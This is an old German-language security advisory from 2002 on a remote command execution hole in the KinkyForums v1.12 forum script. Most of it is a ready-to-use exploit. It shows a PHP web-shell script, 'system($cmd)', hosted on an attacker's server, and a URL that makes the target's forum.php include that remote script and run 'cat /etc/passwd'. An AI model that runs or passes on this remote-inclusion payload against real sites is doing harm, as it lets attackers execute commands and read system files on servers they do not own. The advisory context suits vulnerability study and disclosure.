Verfasser: Zero X
E-Mail: Zero_X@lobnan.de
Webseite: www.lobnan.de
Datum: 14. September 2002

Remote Command Execution in KinkyForums v1.12

Die Datei forum.php führt jede beliebige Datei mit der Endung php aus. Es ist möglich ein Skript von einem anderen Server auszuführen.

Exploitbeispiel:

man erstellt auf einem Server eine Datei mit der Endung php (in diesem Beispiel script.php)

im Skript steht folgendes:

<? 
echo("<? 
system(\"\$cmd\"); 
?>"); 
?>

Mit diesem Script kann man Linuxsysteme ausführen.

Dann gibt man folgende URL ein:

http://www.webseite.com/forum/forum.php?page=http://dein_server/script&cmd=cat /etc/passwd

Bei diesem Beispiel versucht der Angreifer sich die Passwort-Datei anzeigen zu lassen.